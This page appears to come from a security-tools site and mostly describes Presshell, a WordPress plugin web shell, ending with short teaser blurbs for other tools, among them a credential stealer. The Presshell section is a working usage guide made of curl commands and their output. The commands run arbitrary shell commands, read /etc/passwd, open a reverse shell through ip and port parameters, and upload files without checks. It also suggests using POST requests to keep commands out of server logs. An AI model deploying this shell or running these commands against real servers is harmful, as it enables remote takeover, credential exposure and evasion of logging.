Presshell is a tool for Quick & dirty WordPress Command Execution Shell. Execute shell commands on your wordpress server. Uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php
To install the shell, we are assuming you have administrative rights to WordPress and can install plugins since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.
Simply upload the zip file located in the Releases section as a new extension and you’re good to go.
Using the shell is straightforward. Simply pass sh
commands as an argument to the shell :
❯ curl ‘http://host/…/shell.php?cmd=uname+-a’
Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
You may as well pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
More complex commands are also supported, careful about your quoting though
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=cat /etc/passwd | grep -v “(false|nologin)”‘
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=python -c “from urllib.parse import urlencode; print(urlencode({\”cmd\”: \”uname -a\”}))”‘
cmd=uname+-a
You can also open a reverse shell using the ip
and port
parameters. The default port is 443
.
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’ –data-urlencode ‘port=1337’
There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.
❯ curl ‘http://host/…/shell.php’ -F ‘file=@some_file’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
some_file
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…